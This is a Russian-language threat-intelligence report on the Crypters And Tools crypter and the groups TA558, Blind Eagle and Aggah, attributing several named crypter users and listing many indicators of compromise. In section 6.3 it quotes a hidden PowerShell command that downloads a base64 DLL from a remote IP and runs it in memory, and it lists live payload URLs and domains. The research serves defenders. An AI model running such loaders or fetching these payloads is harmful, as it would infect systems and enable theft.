Содержание
Особенности группы TA558 и ее отличия от инфраструктуры Blind Eagle
Aggah. Новые атаки и связь с TA558
6.1.1. Атаки 2018 года
6.1.2. Атаки 2019 года
6.1.3. Hagga (Aggah). Рождение названия группировки
6.1.4. Атаки 2020-2022 годов
Пользователи Crypters And Tools и их связи с группировками
7.1 bukky101
7.2 Blind Eagle: deadpoolstart2025 и ABBAS
7.3 TA558: Brainiac, syscore и negrocock
7.4 KareemHacker
7.5 HeadMaster
Список статей с упоминанием рассматриваемых группировок и криптора
1. Ключевые находки
Как минимум, 6 публично известных группировок использовали Crypters And Tools
Часть из них связаны между собой, что мы показали в своём исследовании
Группировка Aggah, которая не упоминалась с 2022 года, до сих пор атакует пользователей по всему миру
Мы смогли установить некоторых пользователей Crypters And Tools
Часть установленных пользователей относятся напрямую к группам Blind Ealge и TA558 и являются их членами
2. Введение
В первой части мы рассказали о крипторе Crypters And Tools, который мы обнаружили в процессе исследования атак различных группировок. Отчет концентрировался на внутреннем устройстве и инфраструктуре самого криптора. В этой части мы расскажем о хакерских группировках, которые использовали его в атаках, их связях, уникальных особенностях, а также о пользователях Crypters And Tools, некоторые из которых связаны с рассматриваемыми группировками.
Также, исследование показало, что группировка Aggah продолжает совершать атаки, несмотря на то что некоторые исследователи считают 2022 концом активности группы.
Многие исследователи сталкивались с атаками с использованием Crypters And Tools, принимали особенности криптора (использование Ande Loader, переменная $codigo, сетевая инфраструктура криптора и так далее) за что-то уникальное и приписывали их к конкретным атакующим, что мы считаем ошибкой. В конце статьи мы приложили все публичные отчеты, где упоминается Crypters And Tools или его ранние версии – Codigo-криптеры.
3. Группировки, использующие Crypters And Tools в атаках
TA558 | Группа, активная с по крайней мере 2018 года, изначально нацелена на индустрию туризма в Латинской Америке, а также Западную Европу и США, но позже расширила свои атаки на другие регионы. Использует фишинг, стеганографию и вредоносное ПО, такое как Agent Tesla, FormBook и Loda RAT |
Blind Eagle/APT-C-36 | C 2018 года атакует Южную Америку, особенно Колумбию, а также Эквадор и Испанию. Применяет фишинг и вредоносное ПО такое как NjRAT, BitRAT, AsyncRAT, фокусируясь на государственных и корпоративных целях |
Aggah/Hagga group | Предположительно пакистанская группа активная по крайней мере с 2018 года. Проводит фишинговые кампании против различных стран, в основном азиатские, то также была замечена за атаками на Латинскую Америку. Используют различные ПО, включая 3LOSH crypter, RevengeRAT и AgentTesla |
PhaseShifters | Группа атакует государственные структуры России, Беларуси и Польши. Использует фишинг, стеганографию и репозитории (GitHub, BitBucket) для доставки вредоносных нагрузок, а также различные ПО, например Rhadamanthys |
UAC-0050 | Группа активная по крайней мере с 2020 года нацелена на украинские, польские и российские госструктуры. Рассылает фишинговые письма, маскируясь под официальные документы, распространяя в основном Remcos RAT, Quasar RAT и Remote Utilities |
Phantom Control | С июля 2023 года использовали скомпрометированные сайты для распространения ScreenConnect, за которым следует AsyncRAT. В какой-то момент перешли на Ande Loader для доставки SwaetRAT. Возможно, связаны с Blind Eagle |
Таблица 1. Группировки, использующие Crypters And Tools
Blind Eagle | TA558 | Aggah | PhantomControl | PhaseShifters | UAC-0050 |
География атак | |||||
Латинская Америка: Колумбия, Эквадор, Чили, Панама, Бразилия | Латинская Америка, Северная Америка, Западная Европа | Латинская Америка, Северная Америка, Западная Европа, Ближний Восток, Восточная Азия | N/A | Россия, Беларусь, Польша | Россия, Беларусь, Польша, Украина, Молдова, страны Балтии |
Используемое ВПО | |||||
Remcos RAT, Async RAT, njRAT, Quasar RAT, BitRAT, LimeRAT | Remcos RAT, Async RAT, Xworm, Lokibot, FormBook, Agent Tesla, Revenge RAT | Rhadamanthys, XWorm, Agent Tesla, Remcos RAT, Warzone RAT, nanocore RAT, njRAT, AzoRult, Lokibot, Revenge RAT | Async RAT, SwaetRAT, ScreenConnect (Remote Access Software) | Rhadamanthys, DarkTrack RAT, Meta Stealer | Remcos RAT, Meduza Stealer, Lumma Stealer, Quasar RAT |
Язык писем и документов | |||||
Испанский, порту-гальский | Испанский, английский, могут использовать языки атакуемых регионов | Английский, испанский, могут использовать языки атакуемых регионов | N/A | Русский | Украинский, русский, румынский, английский |
Использование САТ | |||||
2023-2025 | 2023-2025 | 2021-2023 | 2023 | 2024 | 2024 |
Таблица 2. Сводная таблица о группировках, использующих Crypters And Tools
В данной статье мы сосредоточены на трёх группировках: TA558, Blind Eagle и Aggah, а также на пользователях Crypters And Tools, которые могут быть с ними связаны. Для наглядности продемонстрируем часть связей между этими группами в следующей таблице:
Aggah | Blind Eagle | |
TA558 | • Периодическое использование строки «cdt» на протяжении всех атак • Атаки на отели в 2018 году • Сходство в использовании ВПО и крипторов (3LOSH, Crypters And Tools) • Похожий код скриптов в атаках в 2024 году | • Использование общей инфраструктуры CryptersAndTools (servidorwindows.ddns.com.br) • Основная география атак – Латинская Америка • Использование в фишинге испанского языка • Похожий инструментарий (Asyncrat, Remcos и т.д.) |
Aggah | N/A | · Использование общей инфраструктуры CryptersAndTools (149.56.200.165) · Исследователи, упоминали, в своём репорте, что возможно группа Aggah – это подгруппа Blind Eagle |
Таблица 3. Пересечение между группами
Все три группы до сих пор активны и совершают множество атак. Aggah в данный момент прекратила использовать Crypters And Tools или или их атаки находятся вне зоны нашего наблюдения. При этом сама группа активна, и мы расскажем об этом в соответствующем разделе.
В это же время, ТА558 и Blind Ealge до сих пор активно пользуются криптором.
Например, в мартовской статье Check Point Research рассказали про атаки группировки Blind Eagle. Мы наблюдали описанную атаку в феврале, и тогда нас привлек IP 62.60.226[.]64, который Check Point тоже указали в качестве индикатора. На нём располагалось множество файлов, связанных Crypters And Tools, хотя в конкретной атаке криптор мог не использоваться.
Про атаки Blind Eagle мы также расскажем ниже в разделе про пользователей Crypters And Tools под никами deadpoolstart2025 и ABBAS и их связь с данной группой.
В случае с TA558 примером атаки с использованием Crypters And Tools может послужить фишинговая атака в марте, где использовался следующий файл:
Purchase Inquiry.xla (SHA-256: 55ea07bbd700488fd6330d289f210b2da119401a9e27009472d1afec2f6c6339)
В атаке фигурировали типичные для TA558 URL:
http://104.168.7.38/xampp/knct/nicefeelingwithbestgoodthinksfor.txt
http://104.168.7.38/xampp/knct/Lightgreatloversonhereforlovingpeoplesalot.hta
http://104.168.7.38/xampp/knct/Lightgreatloversonhereforlovingpeoplesalot.png
Пользователи Brainiac, syscore и negrocock, связанные с TA558, также будут упомянуты в соответствующем разделе.
Отметим, что TA558 и Blind Ealge не ограничиваются использованием только Crypters And Tools в своих атаках. Например, в апреле 2025 мы обнаружили типичное письмо TA558:
Письмо содержало два вредоносных документа, которые скачивали вредоносную нагрузку с сервера с узнаваемым для ТА558 паттерном:
http://216.9.224.185/33/eco/goodthingsforbestfeaturesgivenmegoodthingsforbest_______________goodthingsforbestfeaturesgivenme_____________goodthingsforbestfeaturesgivenme.doc
Далее скачивался и выполнялся goodthingsforbestfeaturesgivenme.vbe, что приводило к заражению жертвы вредоносным ПО Remcos. Crypters And Tools в данной атаке не использовался.
4. PhaseShifters, UAC-0050 и PhantomControl
В первой части мы уже рассказывали, что вышли на сам Crypters And Tools, когда исследовали группировки PhaseShifters и UAC-0050. Пересечения между этими группировками описаны в одной из наших статей, поэтому мы не будем концентрироваться на этих группах, но отметим, что не обнаружили их явной связи с создателями самого криптора. Предположительно, они приобрели подписку.
Про группу PhantomControl есть только два отчета от компании Esentire. В первом отчете Crypters And Tools не фигурировал, но во втором группа стала использовать Ande Loader. В отчете данное ВПО было атрибутировано к группе Blind Eagle, но Ande Loader используется в Crypters And Tools, поэтому прямая атрибуция некорректна. Так, например, ссылки на paste.ee и картинки, указанные в статье, принадлежат криптору. Поэтому можно точно сказать, что группа использовала Crypters And Tools в своих атаках, но дополнительной информацией о PhantomControl мы не располагаем.
5. Особенности группы TA558 и ее отличия от инфраструктуры Blind Eagle
В статьях, где исследователи сталкивались с Crypters And Tools часто возникали ложные связи между группировками из-за отсутствия ранее информации о том, что данный криптор – это отдельная сущность, а не уникальный инструмент какой-то группировки. Примером может служить отчет исследователей из Qi An Xin 2023 года, где они предполагают, что группа Aggah может быть подгруппой Blind Eagle, основываясь на значительном сходстве TTP, частичном пересечении вредоносного ПО, географически близким целям и т.д. Мы не исключаем эту возможность, но в предыдущем исследовании мы объяснили упомянутые в статье пересечения использованием Crypters And Tools. Тем не менее, при детальном анализе поздних стадий атак отличия TA558 и Blind Eagle начинают проявляться.
В данном разделе мы укажем некоторые особенности TA558 и Blind Eagle, которые позволяют нам их различать. Эти данные позволят нам найти связи между данными группами и некоторыми пользователями Crypters And Tools в соответствующем разделе.
5.1 Характерные URL и имена файлов TA558
В атаках TA558 часто встречаются паттерны URL, которые мы не связываем с Crypters And Tools:
103.67.162.213/xampp/gd/kissingagirlissoeasyrecentlyireallyfeelsheismygirlineverwanttohurtherweneverwantotkissher_______ilovehertrulyfromtheheartiloveyou..doc
172.232.175.155/88122/bh/bh.h.h.h.hhhhh.doC
172.234.239.22/990099/gf/l.c.c.c.ccx.doC
Также среди вредоносных файлов TA558 было множество повторяющихся имен и паттернов. Примеры типичных имен файлов ниже:
PO-24052800.xls
factura 00005111, 005114, 005115.pdf.xlam
Orden de compra 4000171682.docx
Вышеуказанные имена относительно уникальны, но стоит отметить, что всё же мы видели подобные названия у одного злоумышленника – bukky101, о котором будет сказано далее.
5.2 Характерные домены TA558
ТА558, Blind Eagle и Aggah используют различные динамические DNS сервисы, такие как duckdns.org, 3utilities или us.archive.org. В большинстве случаев эти домены являются доменами Crypters And Tools. Например URL, который мы указывали в качестве инфраструктуры TA558 в одной из версий Crypters And Tools появился внутри самого криптора:
http://servidorwindows.ddns.com.br/Files/js.jpeg
При этом в атаках мы встречали использование доменов, очень похожих на домены TA558, и файлов с характерными длинными именами, которые при этом не присутствуют внутри самого Crypters And Tools. Ниже приведены такие домены с повторяющимися буквами внутри названий дней недели:
mondayyyyvbsgreeceee.duckdns.org
wednesdayyyyyyfile.duckdns.org
thursdayyyyyyfileeee.duckdns.org
fridayyyyvert.3utilities.com
5.3 Различия в инфраструктуре TA558 и Blind Eagle
Blind Eagle использует преимущественно колумбийские ASN, в то время как у TA558 этого замечено не было. Ниже представлена таблица, которая показывает популярные ASN у групп, а также примеры IP-адресов из этих ASN, атрибутированных к TA558 и Blind Eagle.
Группа | Топ ASN группы | Пример IP адресов |
Blind Eagle | Colombia Movil | 179.15.149.222 191.88.255.30 181.134.151.81 181.131.216.73 181.52.105.166 |
Telmex Colombia | ||
Tigo – UNE | ||
TA558 | AS-COLOCROSSING | 192.210.150.33 107.172.148.248 104.168.7.36 149.28.237.172 172.234.217.133 |
Akamai Connected Cloud | ||
AS-VULTR |
Таблица 4. Инфраструктура злоумышленников
6. Aggah. Новые атаки и связь с TA558
Aggah (Hagga) – это хакерская группировка, нацеленная на кражу информации и проводящая фишинговые кампании по всему миру. Среди распространяемого ВПО – RevengeRAT, Agent Tesla, Nanocore RAT, Warzone RAT, NjRAT, AzoRult и другое. Особый элемент в их цепочке атаки – частое использование serverless инфраструктуры для размещения вредоносной нагрузки, к примеру, Blogspot, Pastebin или WebArchive. В 2018 году на сайте FreeBuf вышла статья, в которой раскрывается предполагаемая личность, стоящая за группировкой. На основе этой статьи можно утверждать, что участники группы Aggah могут происходить из Пакистана.
Ниже показаны некоторые взаимосвязи между группировками TA558 и Aggah на основе открытых источников и прошлых кампаний злоумышленников. Однако для того, чтобы утверждать, что это одна и та же группировка, необходимо провести дополнительное исследование. На данном этапе можно предполагать о том, что Aggah поддерживает связь с TA558, обмениваясь идеями для атак, используемым ВПО и другими инструментами.
Чтобы проиллюстрировать связь Aggah и TA558 нам придется углубиться в первые атаки Aggah, которые описывались до получения группировкой своего имени.
6.1 Первые упоминания Aggah
Первые атаки группировки можно заметить в 2018 году – вредоносные кампании Roma225 и Operation Commando. Атрибуция этих вредоносных кампаний к группировке показана далее.
6.1.1. Атаки 2018 года
Анализ вредоносной кампании Roma225, вышел в декабре 2018 года от компании Yoroi. В этой кампании исследователи описали распространение RevengeRAT через PowerPoint-документы с использованием сервиса Blogspot. Из данной статьи стоит запомнить несколько важных фактов:
Метаданные распространяемого документа (автор C.D.T Original)
Использование словосочетания «CDT» в переменных кода
На тот момент Aggah еще не получили своё имя, но пока отметим, что TA558 впервые упоминается компанией Proofpoint в том же 2018 году. Более того, эксперты в исследовании упоминают те же метаданные и сетевые индикаторы компрометации, что были в компании Roma225: автор документа “C.D.T Original” и домен cdtmaster[.]com, однако никакой взаимосвязи между Roma225 и TA558 не было отмечено.
6.1.2. Атаки 2019 года
В марте 2019 года от Unit42 вышла статья про Operation Сomando направленную на отели. Описываемая кампания имеет ряд сходств с кампанией Roma225, которые показаны в таблице ниже. На основе указанных пересечений можно сделать вывод, что обе описываемые кампании принадлежат одной и той же хакерской группировке, которая также на тот момент пока не получила название Aggah.
Unit42 – Operation Comando | Yoroi – Roma225 Campaign |
Dropurls | |
minhacasaminhavidacdt.blogspot[.]com | minhacasaminhavidacdt.blogspot[.]com |
internetexplorer200[.]blogspot[.]com | pocasideiascdt.blogspot[.]com |
| cdtmaster[.]com.br |
C2 | |
systenfailued.ddns[.]com[.]br | systen32.ddns[.]net |
office365update[.]duckdns[.]org | office365update[.]duckdns.org |
cdtoriginal[.]ddns[.]net |
|
Таблица 6. Сравнение доменов из двух кампаний
В 2019 году атаки на отели продолжались и от TA558, но явных пересечений между описываемыми атаками нет.
6.1.3. Hagga (Aggah). Рождение названия группировки
В апреле 2019 года Unit42 выпускают статью, которую называют "Aggah Campaign”. В данном исследовании описывались атаки с использованием ВПО RevengeRAT и легитимных сервисов Pastebin, Blogspot, Bit.ly. Тогда вредоносная кампания получила свое название из-за используемого слова “hagga” в конфигурации ВПО. Такую же строчку содержало и имя пользователя на сайте Pastebin. Но главное в этой статье – показанные в ней пересечения с прошлым исследованием:
Название мьютекса с допущенной ошибкой в слове “System32” - RV_MUTEX-WindowsUpdateSysten32
Использование ключей “oldman”, “steve”, “hagga”, “roma225” в конфигурации RevengeRAT
Сетевые индикаторы из предыдущих атак: office365update.duckdns[.]org, systen32.ddns[.]net
Таким образом, именно Aggah стояли за Roma225 и Operation Comando.
Один из самых интересных фактов – использование идентификатора “HOTEIS NOVOS” (“NEW HOTELS” в переводе с португальского) в атаках. Этот момент примечателен тем, что группа ТА558 в это же время проводила атаки на отели с вредоносными письмами и документами также на португальском.
6.1.4. Атаки 2020-2022 годов
В 2019 – 2021 годах Aggah распространяли AzoRult, используя свою панель управления - ManaTools. Слово «mana» часто будет встречаться – в авторах документов и доменах. В одном из следующих разделов мы покажем потенциальную связь между Aggah и Crypters And Tools, основываясь в том числе на этом факте.
Примеры доменов, используемые группировкой Aggah в 2019 году:
mastermana1.serveirc[.]com
mastermana2.serveirc[.]com
mastermana3.serveirc[.]com
mastermana4.serveirc[.]com
mastermana5.serveirc[.]com
За период 2020-2022 года мы заметили следующие интересные связи между TA558 и Aggah:
Схожая география атак: Латинская Америка и Западная Европа; похожий набор ВПО, к примеру, обе группы использовали Remcos RAT, RevengeRAT и AzoRult.
В 2021 году адрес 3.218.4.249 использовался обеими группами для размещения вредоносной нагрузки.
Обе группы в своих доменах используют аббревиатуру C.D.T:
warzonecdt[.]duckdns[.]org (ТА558, источник: Proofpoint)
ccnewcdt[.]duckdns[.]org (Aggah, один из доменов, который резолвился в 192.154.226[.]47, источник: Team Cymru)
Общие метаданные и сходства в макросах вредоносных документов.
6.2 Атаки 2023-2025 годов
Несмотря на то, что по публичным отчетам активность Aggah не проявлялась в конце 2022 года, мы нашли некоторые данные, позволяющие предположить, что группировка была активна и все еще продолжает свою деятельность.
В ходе поиска новой активности группировки мы нашли файлы, которые по стилю кода и характерным признакам напомнили предыдущие атаки Aggah. Дальнейшее исследование показало, что они связаны с фишинговой кампанией meme#4chan, описанной в отчете Securonix в 2023 году. Хотя в отчете эта кампания не была атрибутирована к конкретной группировке, обнаруженные нами совпадения позволяют предположить, что за ней стоял именно Aggah.
При сравнении атак обнаружилось несколько ключевых признаков, характерных для прошлых операций Aggah:
Тематика писем – гостиничный бизнес и туристическая сфера. Несмотря на популярность этой темы в фишинге, Aggah неоднократно использовали ее ранее. Более того, названия документов встречались как на английском, так и на португальском (аналогично атакам 2019 года).
Использование serverless-инфраструктуры: blogspot, mediafire, usrfiles.
Стиль кода: во многих атаках код, похоже, писался вручную, с нестандартными, порой ироничными названиями переменных, а также с использованием слов на языке урду. Этот момент важен, так как выше мы уже указывали на возможное пакистанское происхождение участников группы Aggah.
Особый интерес вызывает один из powershell-скриптов, в котором присутствует переменная $ALLSAVEBACKUP, содержащая ссылку на Blogspot-страницу backuphotelall.blogspot[.]com, а также характерный комментарий, который будет повторяться в дальнейших атаках Aggah.
Этот Blogspot использовался для загрузки вредоносных файлов, которые затем можно было найти и на других Blogspot-страницах, а также в хранилищах Bitbucket. Одним из таких файлов был all.txt, доступный по следующим ссылкам:
https://backuphotelall.blogspot[.]com/atom.xml |
https://otherbusinesssep23.blogspot[.]com/atom.xml |
https://backupalllogsmay23.blogspot[.]com/atom.xml |
https://hotelbackuppowaug.blogspot[.]com/atom.xml |
https://otherbizzunus.blogspot[.]com/atom.xml |
По ним можно найти атаки после meme#4chan кампании. К примеру, страница hotelbackuppowaug.blogspot[.]com использовалась в файле lnvoice 1882936796.js, чей код имел схожие комментарии с предыдущими атаками. (Полный разбор можно посмотреть на AnyRun)
Исследование подобных атак привело нас к кампании, начавшейся в конце 2023 года. В этот период Aggah начали распространять вредоносные файлы на тему налогов или счетов, содержащие XWorm или Agent Tesla. Использование blogspot и bitbucket сохранилось, а код скриптов изменился не существенно.
Пример файла из этой кампании: Robert_Michael_Tax_2023.js. Этот обфусцированный javascript файл обращается к хранилищу BitBucket kimkardaikehsi и загружает Agent Tesla. Можно заметить схожесть кода с предыдущими примерами.
А в сетевых индикаторах можно увидеть использование словосочетания “CPA” и “mana”:
manablack.duckdns[.]org |
cpamay2024.duckdns[.]org |
cpanewminemay24.duckdns[.]org |
В 2025 году атаки Aggah продолжаются, но основной вредоносной нагрузкой теперь стали Rhadamanthys и XWorm. Типичная цепочка заражения начинается с обфусцированного javascript файла (названия часто связаны с налоговой тематикой или формами отчетности), который в итоге приводит к выполнению следующего PowerShell-кода:
При обращении к Blogspot происходит редирект на bitbucket, откуда загружается финальный powershell-скрипт, устанавливающий вредоносное ПО на устройство жертвы. Стоит отметить, что в некоторых случаях перед загрузкой вредоносной нагрузки происходит дополнительная проверка геолокации, что позволяет атакующим подбирать соответствующие версии вредоносных программ в зависимости от региона. Примеры заражений с использованием XWorm и Rhadamanthys можно найти в отчетах AnyRun.
6.2.1. Очередные пересечения Aggah с TA558
В 2024 году исследователь IdaNotPro опубликовал разбор одного из файлов, использованных в атаках TA558, под заголовком «TA558 Targeting Brazil». В кампании вновь фигурировали фишинговые письма и вредоносные документы, связанные с гостиничным бизнесом, а также C2-домены с cdt — элемент, который встречается в инфраструктуре как TA558, так и Aggah.
При сравнении разбираемого исследователем файла с атаками Aggah, мы нашли некоторые интересные совпадения. Вот несколько основных сходств:
Стадия с powershell-скриптом, скачиваемым с detail-booking.com[.]br похожа на таковую в атаках Aggah. Например, использование функции kimkarden у ТА558, а со стороны Aggah – BitBucket kimkardaikeshi. Кроме того, если сравнить код, можно заметить определенные схожести:
Некоторые файлы, связанные с доменом detail-booking.com[.]br, использовавшимся ТА558, имели похожие на Aggah названия:
![Рисунок 21. Связанные с доменом detail-booking.com[.]br файлы](https://habrastorage.org/r/w1560/getpro/habr/upload_files/d51/422/678/d5142267888b5913f08dfa6eb0e0a4ec.png "Рисунок 21. Связанные с доменом detail-booking.com[.]br файлы")
В конфигурации одного из файлов, общающихся с итоговым C2 доменом cdt2023.ddns.net из атаки TA558, были обнаружены строки, содержащие текст «CPA», что является одной из отличительных характеристик атак Aggah.
Сравнение атак Aggah с кампаниями TA558, несмотря на сходства в инфраструктуре и методах, не позволяет однозначно утверждать, что это одна и та же группировка. Тем не менее, оно демонстрирует, что группировки могут обмениваться инструментами, идеями и ресурсами.
6.3 Использование Crypters And Tools группой Aggah
В разделе про атаки Aggah 2020-2022 мы упоминали использование группой ManaTools.
В 2021 году Aggah начали использовать 3LOSH Crypter и FsocietyAndTools – одну из более ранних версий CryptersAndTools. При анализе атак за 2021 и 2022 год мы заметили несколько интересных деталей, указывающих на связь Aggah и codigo-крипторов. Например, обнаруженный нами IP-адрес 198.50.177[.]251 использовался как хостинг для нескольких ресурсов, включая директорию “mastermana”, содержащую файлы для атак группы Aggah, а также учетную запись, принадлежащую разработчику криптора nodetecton (использовалась в цепочке запуска криптора).
-windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://nodetecton@198.50.177.251/dll/1.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.85618406295/anamretsam/152.771.05.891//:ptth'))"
Помимо этого, как было сказано раннее, в 2019 – 2021 годах исследователи заметили использование разработанной Aggah панели управления в атаках группы – Mana Tools. В атаках 2022 года была обнаружена атака с использованием ВПО XWorm, где в качестве C2 использовался Telegram-бот, с которым коммуницировал аккаунт @mastermana.
Поиск упоминаний Telegram-аккаунта приводит к Youtube-каналу “Tiny Technology”, на котором содержатся демонстрационные видеоролики работы различных эксплойтов. На большинстве видеороликов используется логотип Mana Tools, но есть более интересные детали из данных видеороликов:
Имена пользователей на компьютере и виртуальных машинах (Master MANA, 007 и другие)
Использование репозитория hogya в BitBucket, который фигурировал до этого в атаках Aggah (рисунок 23)
Интерфейс криптора CryptersAndTools, на котором присутствуют логотипы обоих инструментов, что наводит на мысли о возможной связи или коллаборации (рисунок 24)
Присутствие CryptersAndTools на системе злоумышленника в 2023 году (рисунок 25)
7. Пользователи Crypters And Tools и их связи с группировками
Как было сказано в первой части, максимальное число активных пользователей криптора, которое мы обнаружили, было 42 на момент 26 ноября 2024 года. При этом стоит отметить, что в списке присутствовали администраторы сервиса, пользователи с разными никами, но одинаковым HardwareID, а также тестовые пользователи. То есть реальное количество активных подписчиков криптора было меньше.
Среди них мы нашли несколько интересных пользователей.
7.1 bukky101
В базе данных нас заинтересовал следующий пользователь:
Про этого пользователя рассказывали Esentire в своей статье, посвящённой фишинговым атакам с использованием Ande Loader, который приводил к заражению стиллером 0bj3ctivity. В статье исследователи рассказали, что после заражения данные отправлялись в телеграм бота. Владельцем бота был юзер bukky101. С учётом всех текущих знаний, мы понимаем, что в приведённой статье bukky101 использовал Crypters And Tools.
Мы проанализировали этого пользователя и его атаки. Например, в мае 2024 года злоумышленник использовал в атаке AgentTesla (SHA-256: 5a8794fa12ff401f9f7212e497d5d877010f493e3bb028abd54cb12f60fc550f). Данные отправлялись на SMTP сервер злоумышленника boydjackson[.]org. Интересно, что злоумышленник использовал пароль Bukky101@. Одну из таких атак исследователи подробно расписали в своей статье.
Во время исследования мы обнаружили множество жертв в разных странах, которые подверглись атаке. Список стран следующий: Армения, Греция, Индия, Ирак, Италия, Кипр, Колумбия, Малайзия, ОАЭ, Пакистан, Саудовская Аравия, Сингапур, Турция.
Жертвы были из совершенно разных отраслей и какого-то общего паттерна в том, кого атаковал Bukky101, видно не было.
В одной из атак злоумышленник запустил вредоносное ПО на своей системе, это позволило получить полезную информацию, включая:
буфер обмена
установленные приложения
информацию об системе, включая IP, наличие антивирусов, эмуляторов и песочниц
ключи windows
историю браузеров
историю скачиваний
топ посещённых сайтов
информацию о сессиях, например Telegram и Skype
Списки wifi с именами и паролями
Таким образом, мы точно выяснили, что злоумышленник Bukky101 из Нигерии. Об этом говорит не только IP, но и использование Airtel Nigeria.
Помимо этого, мы обнаружили, что хакер массово посылал письма в различные страны. На момент февраля 2025 года, злоумышленник послал более 6160 различных писем в разные страны. Приведём несколько примеров названий таких писем и различие тем фишинга:
DETAIL OF H Sale order # 128578 (PAKISTAN.PACKAGES)
Position for the Head of IT / Manager IT
Прайс лист на продукцию
محاكم راس الخيمة إعلان:3100134384
[Gabrini Cosmetics]: New order #80464
Re: Proposal of Stall Design and Fabrication for AAHAR Expo 04-08 March 2025 (New delhi)
✅ Нов термин за работилница: Последни измени на Законот за јавни набавки, актуелни теми и предизвици
Atașez și poze cu , coletul ce mi-a ajuns , și factura lângă
Factura fiscala cutii carton_22.11.2024
Dit verandert er in de tarieven en voorwaarden op ons platform
REQUEST FOR PROPOSAL FOR WORLD VISION ZIMBABWE
Большинство писем содержали html с уже введенным логином потенциальной жертвы. Как только пользователь вводил пароль в форму, то выдаёт ошибку, что пароль не действителен, а в тоже время посылается запрос в телеграм бот, но принадлежащий уже другому пользователю - @Gfcafmin.
Также мы обнаружили открытую директорию, принадлежащую пользователю bukky101 с IP 37.49.228.234, которая упоминалась в соцсети X.
Во время исследования bukky101 мы обнаружили, что он сотрудничает с множеством людей из теневого сообщества. Так, один из тех, кто сотрудничал с bukky101 использовал сервер 185.38.142.224, для отправки вредоносных email по всему миру. По нашим данным с этого IP было отправлено по крайней мере 60300 писем в течение суток.
Одно из таких писем выглядело следующим образом:
При нажатии на ссылку, происходит скачивание JS файла со следующего сайта:
https://21ninety.info/file/Purchase-Order.js
Этот скрипт скачивал данные с paste.ee, а затем обращался через API на сервер CryptersAndTools для получения дальнейшей нагрузки:
3005.filemail.com/api/file/get?filekey=
В последствии данные выгружались в телеграм бот, принадлежащий пользователю To The World Master Solution - @Mastersolution2.
У нас есть гипотеза, что bukky101 может быть связан с одной из группировок Aggah, TA558 и Blind Eagle, но данных для однозначного вывода пока недостаточно.
Помимо этого, ранее исследователи писали о связях группировки Aggah и нигирийских хакерах. В статье говорилось, что нигирийские хакеры заимствовали инструментарий для атак у групп из Пакистана, а именно – у Aggah, что частично соотносится с описанными выше фактами.
7.2 Blind Eagle: deadpoolstart2025 и abbas
В процессе исследования группировки Blind Eagle мы наткнулись на сервер 181.71.217.114, который принадлежит привычной для Blind Eagle ASN Colombia Movil (AS 27831). Из доменов, которые резолвились в этот IP большинство имели паттерн strekhostYYYY, например, strekhost2024[.]duckdns[.]org. Эти домены были атрибутированны к группировке Blind Eagle компанией Zscaler, судя по публично доступному репозиторию на GitHub.
Помимо этих доменов, были несколько других, а именно:
deadpoolstart2025.duckdns.org
deadpoolstart2026.duckdns.org
deadpoolstart2051.duckdns.org
Также на другом IP 179.14.11.213 можно найти ещё несколько версий deadpoolstart с разными годами, например - deadpoolstart2035.duckdns.org.
Оказалось, что в базе данных Crypters And Tools присутствует пользователь deadpoolstart2025.
Одна из атак его выглядела следующим образом.
14 ноября 2024 года злоумышленник отправил вредоносное письмо c поддельным отправителем в лице колумбийского производителя медицинских лекарств:
Ссылка вела на google drive, с которого скачивался запароленный архив “FOLIO_INCONSISTENCIA_REVISION_FISCAL_CARTERA_DETALLES_DETALLES_AMPLIADOS_CODIGO_VERIFICACION_ad851874148487ff17817ca2545434453154617ff5464484171525541748594ca6544981894ff11258749565284_XML.rar” (SHA-256: 5fe3f4e4ab026fbcd0b595c7b35eb3b3997cae0fc8b92728b0bd556a3ec3c092). Пароль от архива содержался в теле самого письма, а внутри находился VBS-файл (SHA-256: 937fcba2f15c795a209032a36a921fe9f53ea7a47e7295573cd1c0ebb8d9d241. В процессе запуска VBS прописывался в автозагрузку, а также загружал вредоносный скрипт с ресурса paste.ee.
Полученный с paste.ee скрипт содержит закодированную в base64 команду с уже привычной $Codigo. После запуска скрипт забирает данные через API с сервера Crypters And Tools – 1017.filemail.com, а также дополнительно обращается к files.catbox.moe. В итоге, запускался AsyncRAT c С2, который уже принадлежит самому злоумышленнику, а не криптору – deadpoolstart2025.duckdns.org (181.71.217.114).
Мы нашли множество атак, связанных с этим пользователем и большинство из них приходиться на период с ноября 2024 по февраль 2025. Во всех обнаруженных атаках злоумышленник использовал Asyncrat. Мы обратили внимание, что mutex asyncrat в этих атаках был довольно интересным:
zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzNUEVOHOSTMALDITASEA
С испанского “nuevo host maldita sea” переводится, как “новый хозяин, черт возьми”
Также в процессе исследования мы нашли сервер Crypters And Tools. Этот сервер использовался для взаимодействия с криптором через API. Один из пользователей, судя по найденному запросу – некий ABBAS:
http://91.92.254.29/Users_API/ABBAS/file_odpxh4oq.2bf.txtn
Если внимательно рассматривать цепочку атаки, то можно найти явные корреляции с атаками Blind Eagle, к примеру IP адреса 191.93.113.10 и 152.201.184.91, которые хостились на типичных для Blind Eagle колумбийских провайдерах. Помимо этого, сама атака коррелирует с недавним описанием Checkpoint.
Этот пользователь присутствовал во всех версиях баз данных, которые мы отслеживали в процессе исследования Crypters And Tools.
В результате можно сказать, что в отличие от bukky101, которого нельзя точно аттрибутировать к Aggah или TA558, атаки пользователей deadpoolstart2025 и ABBAS полностью соответствуют описанию Blind Eagle, включая язык, жертв, серверную инфраструктуру и т.д., поэтому в данном случае мы считаем, что deadpoolstart2025 и abbas являются членами Blind Eagle или напрямую сотрудничают с этой группой.
7.3 TA558: Brainiac, syscore и negrocock
Как мы показали в случае с пользователем ABBAS, некоторых пользователей Crypters And Tools мы обнаружили в процессе исследования отдельных активностей группировок Blind Eagle и TA558.
Были найдены два пользователя – BrainiacMax и syscore, которые взаимодействовали через API с инфраструктурой криптора:
http://91.92.254.14/Users_API/BrainiacMAX/file_ksg3fckt.hot.txt
http://66.70.160.254/Users_API/syscore/file_ikvt3ei1.mgv.txt
В главе “Особенности группы TA558” мы привели уникальные черты, которые позволяют идентифицировать группировку. В данном случае цепочка атаки BrainiacMax содержит классический пример ТА558 – хосты на AS-COLOCROSSING и уникальные названия:
http://192.3.216.148/datingloverstartingAgain.vbs
